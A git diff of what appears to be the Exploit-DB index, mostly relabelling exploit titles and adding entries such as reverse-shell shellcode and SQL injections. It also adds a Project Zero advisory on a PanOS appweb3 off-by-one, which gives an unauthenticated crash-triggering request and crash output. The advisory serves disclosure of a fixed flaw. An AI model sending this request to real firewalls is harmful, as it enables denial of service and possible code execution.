-26175,platforms/windows/remote/26175.rb,"Microsoft Internet Explorer - COALineDashStyleArray Integer Overflow (MS13-009)",2013-06-13,Metasploit,windows,remote,0
+26175,platforms/windows/remote/26175.rb,"Microsoft Internet Explorer - COALineDashStyleArray Integer Overflow (MS13-009) (Metasploit)",2013-06-13,Metasploit,windows,remote,0
 26196,platforms/windows/remote/26196.txt,"BEA WebLogic 7.0/8.1 - Administration Console Cross-Site Scripting",2005-08-24,GomoR,windows,remote,0
 26198,platforms/linux/remote/26198.txt,"Astaro Security Linux 6.0 01 - HTTP CONNECT Unauthorized Access",2005-08-25,"Oliver Karow",linux,remote,0
 26210,platforms/multiple/remote/26210.txt,"bfcommand & control server 1.22/2.0/2.14 manager - Multiple Vulnerabilities",2005-08-29,"Luigi Auriemma",multiple,remote,0
@@ -13327,7 +13336,7 @@ id,file,description,date,author,platform,type,port
 27244,platforms/linux/remote/27244.txt,"Wimpy MP3 Player 5 - Text File Overwrite",2006-02-16,ReZEN,linux,remote,0
 27271,platforms/windows/remote/27271.rb,"HP Data Protector - CMD Install Service (Metasploit)",2013-08-02,"Ben Turner",windows,remote,0
 27277,platforms/windows/remote/27277.py,"PCMan FTP Server 2.07 - 'PASS' Command Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0
-27528,platforms/hardware/remote/27528.rb,"D-Link Devices - Unauthenticated Remote Command Execution (2)",2013-08-12,Metasploit,hardware,remote,0
+27528,platforms/hardware/remote/27528.rb,"D-Link Devices - Unauthenticated Remote Command Execution (Metasploit) (2)",2013-08-12,Metasploit,hardware,remote,0
 27293,platforms/php/remote/27293.rb,"PineApp Mail-SeCure - test_li_connection.php Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,php,remote,7443
 27294,platforms/php/remote/27294.rb,"PineApp Mail-SeCure - ldapsyncnow.php Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,php,remote,7443
 27295,platforms/unix/remote/27295.rb,"PineApp Mail-SeCure - livelog.html Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,unix,remote,7443
@@ -13339,7 +13348,7 @@ id,file,description,date,author,platform,type,port
 27397,platforms/linux/remote/27397.txt,"Apache suEXEC - Privilege Elevation / Information Disclosure",2013-08-07,kingcope,linux,remote,0
 27400,platforms/windows/remote/27400.py,"HP Data Protector - Arbitrary Remote Command Execution",2013-08-07,"Alessandro Di Pinto and Claudio Moletta",windows,remote,0
 27401,platforms/windows/remote/27401.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Authentication Bypass / Directory Traversal SAM Retrieval Exploit",2013-08-07,Wireghoul,windows,remote,0
-27428,platforms/hardware/remote/27428.rb,"D-Link Devices - Unauthenticated Remote Command Execution (1)",2013-08-08,Metasploit,hardware,remote,0
+27428,platforms/hardware/remote/27428.rb,"D-Link Devices - Unauthenticated Remote Command Execution (Metasploit) (1)",2013-08-08,Metasploit,hardware,remote,0
 27429,platforms/windows/remote/27429.rb,"Mozilla Firefox - onreadystatechange Event DocumentViewerImpl Use-After-Free (Metasploit)",2013-08-08,Metasploit,windows,remote,0
 27452,platforms/hardware/remote/27452.txt,"F5 Firepass 4100 SSL VPN - Cross-Site Scripting",2006-03-21,"ILION Research",hardware,remote,0
 27508,platforms/php/remote/27508.txt,"PHP 4.x/5.x - Html_Entity_Decode() Information Disclosure",2006-03-29,Samuel,php,remote,0
@@ -13415,15 +13424,15 @@ id,file,description,date,author,platform,type,port 28007,platforms/windows/remote/28007.txt,"WinSCP 3.8.1 - URI Handler Arbitrary File Access",2006-06-12,"Jelmer Kuperus",windows,remote,0 28030,platforms/unix/remote/28030.txt,"Cisco Secure ACS 2.3 - LoginProxy.cgi Cross-Site Scripting",2006-06-15,"Thomas Liam Romanis",unix,remote,0 28081,platforms/ios/remote/28081.txt,"Apple Safari 6.0.1 for iOS 6.0 / Apple Mac OSX 10.7/8 - Heap Buffer Overflow",2013-09-04,"Vitaliy Toropov",ios,remote,0 -28082,platforms/windows/remote/28082.rb,"Microsoft Internet Explorer - CFlatMarkupPointer Use-After-Free (MS13-059)",2013-09-04,Metasploit,windows,remote,0 +28082,platforms/windows/remote/28082.rb,"Microsoft Internet Explorer - CFlatMarkupPointer Use-After-Free (MS13-059) (Metasploit)",2013-09-04,Metasploit,windows,remote,0 28083,platforms/windows/remote/28083.rb,"HP LoadRunner - lrFileIOService ActiveX WriteFileString Remote Code Execution (Metasploit)",2013-09-04,Metasploit,windows,remote,0 28118,platforms/windows/remote/28118.html,"Microsoft Internet Explorer 5.0.1 - OuterHTML redirection Handling Information Disclosure",2006-06-27,"Plebo Aesdi Nael",windows,remote,0 28170,platforms/windows/remote/28170.rb,"freeFTPd 1.0.10 - 'PASS' SEH Overflow (Metasploit)",2013-09-09,"Muhamad Fadzil Ramli",windows,remote,21 28181,platforms/linux/remote/28181.c,"AdPlug 2.0 - Multiple Remote File Buffer Overflow Vulnerabilities",2006-07-06,"Luigi Auriemma",linux,remote,0 28183,platforms/windows/remote/28183.py,"eM Client e-mail client 5.0.18025.0 - Persistent Cross-Site Scripting",2013-09-10,loneferret,windows,remote,0 28186,platforms/windows/remote/28186.c,"Kaillera 0.86 - Message Buffer Overflow",2006-07-06,"Luigi Auriemma",windows,remote,0 -28187,platforms/windows/remote/28187.rb,"Microsoft Internet Explorer - CAnchorElement Use-After-Free (MS13-055)",2013-09-10,Metasploit,windows,remote,0 -28188,platforms/windows/remote/28188.rb,"HP SiteScope - Remote Code Execution 
(2)",2013-09-10,Metasploit,windows,remote,8080 +28187,platforms/windows/remote/28187.rb,"Microsoft Internet Explorer - CAnchorElement Use-After-Free (MS13-055) (Metasploit)",2013-09-10,Metasploit,windows,remote,0 +28188,platforms/windows/remote/28188.rb,"HP SiteScope - Remote Code Execution (Metasploit) (2)",2013-09-10,Metasploit,windows,remote,8080 28189,platforms/windows/remote/28189.txt,"Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution",2006-07-06,Nanika,windows,remote,0 28198,platforms/windows/remote/28198.py,"Microsoft Office 2000/2002 - Property Code Execution",2006-07-11,anonymous,windows,remote,0 28209,platforms/multiple/remote/28209.txt,"FLV Players 8 - player.php url Parameter Cross-Site Scripting",2006-07-12,xzerox,multiple,remote,0 
@@ -13460,9 +13469,9 @@ id,file,description,date,author,platform,type,port
 28424,platforms/linux/remote/28424.txt,"Apache 1.3.35 / 2.0.58 / 2.2.2 - Arbitrary HTTP Request Headers Security",2006-08-24,"Thiago Zaninotti",linux,remote,0
 28438,platforms/windows/remote/28438.html,"Microsoft Internet Explorer 5.0.1 - Daxctle.OCX Spline Method Heap Buffer Overflow",2006-08-28,XSec,windows,remote,0
 28450,platforms/hardware/remote/28450.py,"FiberHome Modem Router HG-110 - Authentication Bypass To Remote Change DNS Servers",2013-09-22,"Javier Perez",hardware,remote,0
-28480,platforms/windows/remote/28480.rb,"CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (2)",2013-09-23,Metasploit,windows,remote,6502
-28481,platforms/windows/remote/28481.rb,"Microsoft Internet Explorer - CCaret Use-After-Free (MS13-069)",2013-09-23,Metasploit,windows,remote,0
-28482,platforms/windows/remote/28482.rb,"Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071)",2013-09-23,Metasploit,windows,remote,0
+28480,platforms/windows/remote/28480.rb,"CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit) (2)",2013-09-23,Metasploit,windows,remote,6502
+28481,platforms/windows/remote/28481.rb,"Microsoft Internet Explorer - CCaret Use-After-Free (MS13-069) (Metasploit)",2013-09-23,Metasploit,windows,remote,0
+28482,platforms/windows/remote/28482.rb,"Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071) (Metasploit)",2013-09-23,Metasploit,windows,remote,0
 28483,platforms/php/remote/28483.rb,"GLPI - install.php Remote Command Execution (Metasploit)",2013-09-23,Metasploit,php,remote,80
 28484,platforms/hardware/remote/28484.rb,"Linksys WRT110 - Remote Command Execution (Metasploit)",2013-09-23,Metasploit,hardware,remote,0
 28489,platforms/windows/remote/28489.txt,"Easy Address Book Web Server 1.2 - Remote Format String",2006-09-04,"Revnic Vasile",windows,remote,0
@@ -13505,7 +13514,7 @@ id,file,description,date,author,platform,type,port
 28962,platforms/multiple/remote/28962.rb,"VMware Hyperic HQ Groovy Script-Console - Java Execution (Metasploit)",2013-10-14,Metasploit,multiple,remote,0
 28968,platforms/windows/remote/28968.html,"Aladdin Knowledge Systems Ltd. PrivAgent - ActiveX Control Overflow",2013-10-15,blake,windows,remote,0
 28973,platforms/windows/remote/28973.rb,"HP Data Protector - Cell Request Service Buffer Overflow (Metasploit)",2013-10-15,Metasploit,windows,remote,0
-28974,platforms/windows/remote/28974.rb,"Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080)",2013-10-15,Metasploit,windows,remote,0
+28974,platforms/windows/remote/28974.rb,"Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080) (Metasploit)",2013-10-15,Metasploit,windows,remote,0
 28981,platforms/multiple/remote/28981.txt,"IBM Websphere 6.0 - Faultactor Cross-Site Scripting",2006-11-13,"Nuri Fattah",multiple,remote,0
 28987,platforms/multiple/remote/28987.c,"Digipass Go3 - Insecure Encryption",2006-11-13,faypou,multiple,remote,0
 29032,platforms/windows/remote/29032.txt,"Conxint FTP 2.2.603 - Multiple Directory Traversal Vulnerabilities",2006-11-15,"Greg Linares",windows,remote,0
@@ -13611,8 +13620,8 @@ id,file,description,date,author,platform,type,port
 29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 - 'SonicDVDDashVRNav.dll' ActiveX Control Remote Buffer Overflow",2007-04-11,"Carsten Eiram",windows,remote,0
 29843,platforms/windows/remote/29843.txt,"webMethods Glue 6.5.1 Console - Directory Traversal",2007-04-11,"Patrick Webster",windows,remote,0
 29853,platforms/windows/remote/29853.rb,"LANDesk Management Suite 8.7 Alert Service - AOLSRVR.exe Buffer Overflow",2007-04-13,"Aaron Portnoy",windows,remote,0
-29857,platforms/windows/remote/29857.rb,"Microsoft Internet Explorer - CardSpaceClaimCollection ActiveX Integer Underflow (MS13-090)",2013-11-27,Metasploit,windows,remote,0
-29858,platforms/windows/remote/29858.rb,"Microsoft Internet Explorer - COALineDashStyleArray Unsafe Memory Access (MS12-022)",2013-11-27,Metasploit,windows,remote,0
+29857,platforms/windows/remote/29857.rb,"Microsoft Internet Explorer - CardSpaceClaimCollection ActiveX Integer Underflow (MS13-090) (Metasploit)",2013-11-27,Metasploit,windows,remote,0
+29858,platforms/windows/remote/29858.rb,"Microsoft Internet Explorer - COALineDashStyleArray Unsafe Memory Access (MS12-022) (Metasploit)",2013-11-27,Metasploit,windows,remote,0
 29859,platforms/java/remote/29859.rb,"Apache Roller - OGNL Injection (Metasploit)",2013-11-27,Metasploit,java,remote,8080
 29873,platforms/multiple/remote/29873.php,"FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,multiple,remote,0
 29884,platforms/multiple/remote/29884.txt,"Apple QuickTime 7.1.5 - QTJava toQTPointer() Java Handling Arbitrary Code Execution",2007-04-23,"Shane Macaulay",multiple,remote,0
@@ -13943,7 +13952,7 @@ id,file,description,date,author,platform,type,port
 32382,platforms/multiple/remote/32382.txt,"Accellion File Transfer Appliance Error Report Message - Open Email Relay",2008-09-15,"Eric Beaulieu",multiple,remote,0
 32426,platforms/windows/remote/32426.c,"DATAC RealWin SCADA Server 2.0 - Remote Stack Buffer Overflow",2008-09-26,"Ruben Santamarta",windows,remote,0
 32429,platforms/windows/remote/32429.html,"Novell ZENworks Desktop Management 6.5 - ActiveX Control 'CanUninstall()' Buffer Overflow",2008-09-27,Satan_HackerS,windows,remote,0
-32438,platforms/windows/remote/32438.rb,"Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012)",2014-03-22,Metasploit,windows,remote,0
+32438,platforms/windows/remote/32438.rb,"Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012) (Metasploit)",2014-03-22,Metasploit,windows,remote,0
 32439,platforms/php/remote/32439.rb,"Horde Framework - Unserialize PHP Code Execution (Metasploit)",2014-03-22,Metasploit,php,remote,80
 32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privilege Escalation / Code Execution (Metasploit)",2014-03-22,Metasploit,hardware,remote,22
 32442,platforms/windows/remote/32442.c,"Nokia PC Suite 7.0 - Remote Buffer Overflow",2008-09-29,Ciph3r,windows,remote,0
@@ -14010,7 +14019,7 @@ id,file,description,date,author,platform,type,port
 32799,platforms/windows/remote/32799.html,"Nokia Phoenix 2008.4.7 Service Software - ActiveX Controls Multiple Buffer Overflow Vulnerabilities",2009-02-10,MurderSkillz,windows,remote,0
 32801,platforms/hardware/remote/32801.txt,"Barracuda Load Balancer - 'realm' Parameter Cross-Site Scripting",2009-02-05,"Jan Skovgren",hardware,remote,0
 32811,platforms/unix/remote/32811.txt,"Adobe Flash Player 9/10 - Invalid Object Reference Remote Code Execution",2009-02-24,"Javier Vicente Vallejo",unix,remote,0
-32904,platforms/windows/remote/32904.rb,"Microsoft Internet Explorer - CMarkup Use-After-Free (MS14-012)",2014-04-16,Metasploit,windows,remote,0
+32904,platforms/windows/remote/32904.rb,"Microsoft Internet Explorer - CMarkup Use-After-Free (MS14-012) (Metasploit)",2014-04-16,Metasploit,windows,remote,0
 32825,platforms/linux/remote/32825.txt,"djbdns 1.05 - Long Response Packet Remote Cache Poisoning",2009-02-27,"Matthew Dempsky",linux,remote,0
 32826,platforms/windows/remote/32826.html,"iDefense COMRaider - ActiveX Control 'write()' Arbitrary File Overwrite",2009-03-02,"Amir Zangeneh",windows,remote,0
 32832,platforms/windows/remote/32832.c,"NovaStor NovaNET 12 - 'DtbClsLogin()' Remote Stack Buffer Overflow",2009-03-02,"AbdulAziz Hariri",windows,remote,0
@@ -14769,7 +14778,7 @@ id,file,description,date,author,platform,type,port
 38170,platforms/android/remote/38170.txt,"Facebook for Android - 'LoginActivity' Information Disclosure",2013-01-07,"Takeshi Terada",android,remote,0
 38179,platforms/multiple/remote/38179.txt,"Dell OpenManage Server Administrator - Cross-Site Scripting",2013-01-09,"Tenable NS",multiple,remote,0
 38186,platforms/hardware/remote/38186.txt,"TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi - Hard-Coded Credentials",2015-09-15,LiquidWorm,hardware,remote,0
-38195,platforms/windows/remote/38195.rb,"Microsoft Windows Media Center - MCL Exploit (MS15-100)",2015-09-15,Metasploit,windows,remote,0
+38195,platforms/windows/remote/38195.rb,"Microsoft Windows Media Center - MCL Exploit (MS15-100) (Metasploit)",2015-09-15,Metasploit,windows,remote,0
 38196,platforms/php/remote/38196.rb,"CMS Bolt - Arbitrary File Upload (Metasploit)",2015-09-15,Metasploit,php,remote,80
 38206,platforms/windows/remote/38206.html,"Samsung Kies - Remote Buffer Overflow",2013-01-09,"High-Tech Bridge",windows,remote,0
 38221,platforms/java/remote/38221.rb,"ManageEngine OpManager - Remote Code Execution (Metasploit)",2015-09-17,Metasploit,java,remote,0
@@ -14888,17 +14897,17 @@ id,file,description,date,author,platform,type,port 36025,platforms/windows/remote/36025.py,"Achat 0.150 beta7 - Buffer Overflow",2015-02-08,"KAhara MAnhara",windows,remote,0 38845,platforms/multiple/remote/38845.txt,"SKIDATA Freemotion.Gate - Unauthenticated Web Services Multiple Command Execution Vulnerabilities",2013-11-19,"Dennis Kelly",multiple,remote,0 38846,platforms/multiple/remote/38846.txt,"Nginx 1.1.17 - URI Processing SecURIty Bypass",2013-11-19,"Ivan Fratric",multiple,remote,0 -38849,platforms/cgi/remote/38849.rb,"Advantech Switch - Bash Environment Variable Code Injection (Shellshock)",2015-12-02,Metasploit,cgi,remote,0 +38849,platforms/cgi/remote/38849.rb,"Advantech Switch - Bash Environment Variable Code Injection (Shellshock) (Metasploit)",2015-12-02,Metasploit,cgi,remote,0 38850,platforms/hardware/remote/38850.txt,"Thomson Reuters Velocity Analytics - Remote Code Injection",2013-11-22,"Eduardo Gonzalez",hardware,remote,0 38851,platforms/hardware/remote/38851.html,"LevelOne WBR-3406TX Router - Cross-Site Request Forgery",2013-11-15,"Yakir Wizman",hardware,remote,0 38853,platforms/hardware/remote/38853.sh,"Multiple D-Link DIR Series Routers - 'model/__show_info.php' Local File Disclosure",2013-12-02,tytusromekiatomek,hardware,remote,0 -38859,platforms/windows/remote/38859.rb,"Oracle BeeHive 2 - voice-servlet processEvaluation()",2015-12-03,Metasploit,windows,remote,7777 +38859,platforms/windows/remote/38859.rb,"Oracle BeeHive 2 - voice-servlet processEvaluation() (Metasploit)",2015-12-03,Metasploit,windows,remote,7777 38860,platforms/windows/remote/38860.rb,"Oracle BeeHive 2 - voice-servlet prepareAudioToPlay() Arbitrary File Upload (Metasploit)",2015-12-03,Metasploit,windows,remote,7777 38900,platforms/php/remote/38900.rb,"phpFileManager 0.9.8 - Remote Code Execution (Metasploit)",2015-12-08,Metasploit,php,remote,80 38905,platforms/multiple/remote/38905.rb,"Atlassian HipChat for Jira Plugin - Velocity Template Injection 
(Metasploit)",2015-12-08,Metasploit,multiple,remote,8080 38910,platforms/windows/remote/38910.txt,"Hancom Office - '.hml' File Processing Heap Buffer Overflow",2013-12-19,diroverflow,windows,remote,0 38911,platforms/windows/remote/38911.txt,"Microsoft Windows Media Center Library - Parsing Remote Code Execution aka 'self-executing' MCL File",2015-12-09,"Eduardo Braun Prado",windows,remote,0 -38912,platforms/windows/remote/38912.txt,"Microsoft Windows Media Center - '.Link' File Incorrectly Resolved Reference",2015-12-09,"Core Security",windows,remote,0 +38912,platforms/windows/remote/38912.txt,"Microsoft Windows Media Center - '.Link' File Incorrectly Resolved Reference (MS15-134)",2015-12-09,"Core Security",windows,remote,0 38918,platforms/windows/remote/38918.txt,"Microsoft Office / COM Object - 'els.dll' DLL Planting (MS15-134)",2015-12-09,"Google Security Research",windows,remote,0 38923,platforms/windows/remote/38923.txt,"Apple Safari For Windows - PhishingAlert Security Bypass",2013-12-07,Jackmasa,windows,remote,0 39097,platforms/linux/remote/39097.txt,"RedHat Piranha - Remote Security Bypass",2013-12-11,"Andreas Schiermeier",linux,remote,0 
@@ -14985,7 +14994,7 @@ id,file,description,date,author,platform,type,port
 39874,platforms/windows/remote/39874.rb,"HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0
 39907,platforms/windows/remote/39907.rb,"Poison Ivy 2.1.x - C2 Buffer Overflow (Metasploit)",2016-06-10,"Jos Wetzels",windows,remote,3460
 39917,platforms/cgi/remote/39917.rb,"IPFire - proxy.cgi Remote Code Execution (Metasploit)",2016-06-10,Metasploit,cgi,remote,444
-39918,platforms/cgi/remote/39918.rb,"IPFire - Bash Environment Variable Injection (Shellshock)",2016-06-10,Metasploit,cgi,remote,444
+39918,platforms/cgi/remote/39918.rb,"IPFire - Bash Environment Variable Injection (Shellshock) (Metasploit)",2016-06-10,Metasploit,cgi,remote,444
 39919,platforms/multiple/remote/39919.rb,"Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Execution (Metasploit)",2016-06-10,Metasploit,multiple,remote,8080
 40441,platforms/hardware/remote/40441.py,"Grandsteam GXV3611_HD - SQL Injection",2016-09-29,pizza1337,hardware,remote,0
 39945,platforms/linux/remote/39945.rb,"Apache Continuum - Arbitrary Command Execution (Metasploit)",2016-06-14,Metasploit,linux,remote,8080
@@ -15036,7 +15045,7 @@ id,file,description,date,author,platform,type,port
 40474,platforms/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",hardware,remote,0
 40491,platforms/multiple/remote/40491.py,"HP Client 9.1/9.0/8.1/7.9 - Command Injection",2016-10-10,SlidingWindow,multiple,remote,0
 40507,platforms/linux/remote/40507.py,"Subversion 1.6.6 / 1.6.12 - Code Execution",2016-10-12,GlacierZ0ne,linux,remote,0
-40561,platforms/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload / Remote Code Execution",2016-10-17,Metasploit,multiple,remote,0
+40561,platforms/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload / Remote Code Execution (Metasploit)",2016-10-17,Metasploit,multiple,remote,0
 40589,platforms/hardware/remote/40589.html,"MiCasaVerde VeraLite - Remote Code Execution",2016-10-20,"Jacob Baines",hardware,remote,0
 40609,platforms/linux/remote/40609.rb,"Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,linux,remote,1471
 40610,platforms/linux/remote/40610.rb,"OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)",2016-10-20,Metasploit,linux,remote,1099
@@ -15071,6 +15080,7 @@ id,file,description,date,author,platform,type,port
 40738,platforms/hardware/remote/40738.sh,"PLANET ADSL Router AND-4101 - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
 40740,platforms/linux_mips/remote/40740.rb,"Eir D1000 Wireless Router - WAN Side Remote Command Injection (Metasploit)",2016-11-08,Kenzo,linux_mips,remote,7547
 40767,platforms/windows/remote/40767.rb,"WinaXe 7.7 FTP Client - Remote Buffer Overflow (Metasploit)",2016-11-15,Metasploit,windows,remote,0
+40778,platforms/windows/remote/40778.py,"FTPShell Client 5.24 - 'PWD' Remote Buffer Overflow",2016-11-18,Th3GundY,windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -15668,6 +15678,7 @@ id,file,description,date,author,platform,type,port
 40259,platforms/win_x86/shellcode/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 40549,platforms/win_x86-64/shellcode/40549.c,"Windows x64 - WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
 40560,platforms/win_x86/shellcode/40560.asm,"Windows x86 - Keylogger Reverse UDP Shellcode (493 bytes)",2016-10-17,Fugu,win_x86,shellcode,0
+40781,platforms/win_x86-64/shellcode/40781.c,"Windows x64 - Reverse Shell TCP Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -24913,7 +24924,7 @@ id,file,description,date,author,platform,type,port
 18022,platforms/php/webapps/18022.txt,"InverseFlow 2.4 - Cross-Site Request Forgery (Add Admin)",2011-10-23,"EjRaM HaCkEr",php,webapps,0
 18042,platforms/php/webapps/18042.txt,"Joomla! Component 'com_techfolio' 1.0 - SQL Injection",2011-10-28,"Chris Russell",php,webapps,0
 18046,platforms/php/webapps/18046.txt,"Joomla! Component Barter Sites 1.3 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0
-18031,platforms/php/webapps/18031.rb,"phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (2)",2011-10-25,Metasploit,php,webapps,0
+18031,platforms/php/webapps/18031.rb,"phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (Metasploit) (2)",2011-10-25,Metasploit,php,webapps,0
 18032,platforms/windows/webapps/18032.rb,"SAP Management Console - OSExecute Payload Execution (Metasploit)",2011-10-24,Metasploit,windows,webapps,0
 18035,platforms/php/webapps/18035.txt,"Online Subtitles Workshop - Cross-Site Scripting",2011-10-26,M.Jock3R,php,webapps,0
 18036,platforms/php/webapps/18036.txt,"eFront 3.6.10 (build 11944) - Multiple Security Vulnerabilities",2011-10-27,EgiX,php,webapps,0
@@ -24993,7 +25004,7 @@ id,file,description,date,author,platform,type,port
 18233,platforms/php/webapps/18233.txt,"Xoops 2.5.4 - Blind SQL Injection",2011-12-11,blkhtc0rp,php,webapps,0
 18236,platforms/php/webapps/18236.txt,"Pixie 1.04 - Blog Post Cross-Site Request Forgery",2011-12-11,hackme,php,webapps,0
 18239,platforms/php/webapps/18239.rb,"Traq 2.3 - Authentication Bypass / Remote Code Execution (Metasploit)",2011-12-13,Metasploit,php,webapps,0
-18243,platforms/php/webapps/18243.rb,"PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection (2)",2011-12-14,Metasploit,php,webapps,0
+18243,platforms/php/webapps/18243.rb,"PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection (2) (Metasploit)",2011-12-14,Metasploit,php,webapps,0
 18246,platforms/php/webapps/18246.txt,"Seotoaster - SQL Injection Admin Login Bypass",2011-12-16,"Stefan Schurtz",php,webapps,0
 18247,platforms/multiple/webapps/18247.txt,"Capexweb 1.1 - SQL Injection",2011-12-16,"D1rt3 Dud3",multiple,webapps,0
 18248,platforms/php/webapps/18248.pl,"mPDF 5.3 - File Disclosure",2011-12-16,ZadYree,php,webapps,0
@@ -36777,3 +36788,6 @@ id,file,description,date,author,platform,type,port
 40756,platforms/php/webapps/40756.py,"Boonex Dolphin 7.3.2 - Authentication Bypass / Remote Code Execution",2016-11-14,0x4148,php,webapps,0
 40771,platforms/php/webapps/40771.txt,"Wordpress Plugin Answer My Question 1.3 - SQL Injection",2016-11-17,"Lenon Leite",php,webapps,0
 40772,platforms/php/webapps/40772.txt,"Wordpress Plugin Sirv 1.3.1 - SQL Injection",2016-11-17,"Lenon Leite",php,webapps,0
+40782,platforms/php/webapps/40782.txt,"Wordpress Plugin BBS e-Franchise 1.1.1 - SQL Injection",2016-11-12,"Lenon Leite",php,webapps,0
+40783,platforms/php/webapps/40783.txt,"Wordpress Plugin Product Catalog 8 1.2.0 - SQL Injection",2016-11-12,"Lenon Leite",php,webapps,0
+40776,platforms/php/webapps/40776.txt,"EditMe CMS - Cross-Site Request Forgery (Add New Admin)",2016-11-18,Vulnerability-Lab,php,webapps,0
diff --git a/platforms/linux/dos/40790.txt b/platforms/linux/dos/40790.txt
new file mode 100755
index 000000000..998746507
--- /dev/null
+++ b/platforms/linux/dos/40790.txt
@@ -0,0 +1,53 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=908
+Palo Alto Networks have published a fix for this issue: http://securityadvisories.paloaltonetworks.com/Home/Detail/68
+
+PanOS uses a modified version of the appweb3 embedded webserver, it's used for
+a variety of tasks and is enabled by default. I've noticed a bug in the core utility routine mprItoa:
+
+char *mprItoa(char *buf, int size, int64 value, int radix);
+
+https://embedthis.com/appweb/doc-3/ejs/api/mpr.html#mpr_8h_1c44ccf179c55dbbcf7aa04ba86090463
+
+The size parameter is documented to be the size of the buffer at *buf, but if
+the value exceeds that it will write one more byte than that as a nul
+terminator.
+
+Note that appweb3 has been EOL since 2012 and no longer receives security
+updates and is not supported by the developer, so security maintenance is the
+responsibility of Palo Alto Networks. It seems crazy to ship a EOL web server,
+but whatever.
+
+I've found an unauthenticated php script that an attacker call force to invoke
+mprItoa() on a default installation at /unauth/php/errorPage.php, it can be
+called like so:
+
+/unauth/php/errorPage.php?code=1e16
+
+This example should corrupt the stored GOT pointer, resulting in some
+unexpected routine being called on the attacker-controlled MaResponse object,
+and crashing with some heap corruption.
+
+*** glibc detected *** /usr/local/bin/appweb3: double free or corruption (out): 0x08229e98 ***
+======= Backtrace: =========
+/lib/libc.so.6[0xf7ee8786]
+/lib/libc.so.6(cfree+0x59)[0xf7ee8bb9]
+/usr/local/bin/../lib/3p/libappweb3.so.1(maFillHeaders+0x128)[0xf7e64c58]
+/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e6793b]
+/usr/local/bin/../lib/3p/libappweb3.so.1(maServiceQueue+0x28)[0xf7e608f8]
+/usr/local/bin/../lib/3p/libappweb3.so.1(maServiceQueues+0x38)[0xf7e5f438]
+/usr/local/bin/../lib/3p/libappweb3.so.1(maRunPipeline+0x37)[0xf7e5f497]
+/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e6346d]
+/usr/local/bin/../lib/3p/libappweb3.so.1(maProcessReadEvent+0x27f)[0xf7e63e0f]
+/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e5ad74]
+/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e36afd]
+/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e3607c]
+/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e30c6f]
+/usr/local/bin/../lib/3p/libappweb3.so.1(threadProcWrapper+0x36)[0xf7e31296]
+/lib/libpthread.so.0[0xf6e9b6e1]
+/lib/libc.so.6(clone+0x5e)[0xf7f52aee]
+======= Memory map: ========
+08048000-0804c000 rwxp 00000000 08:02 67709 /usr/local/bin/appweb3
+0804c000-095e5000 rwxp 00000000 00:00 0 [heap]
+f1c00000-f1cd0000 rwxp 00000000 00:00 0
+
+etc.
diff --git a/platforms/linux/local/40774.sh b/platforms/linux/local/40774.sh
new file mode 100755
index 000000000..5299bdbf5
--- /dev/null
+++ b/platforms/linux/local/40774.sh
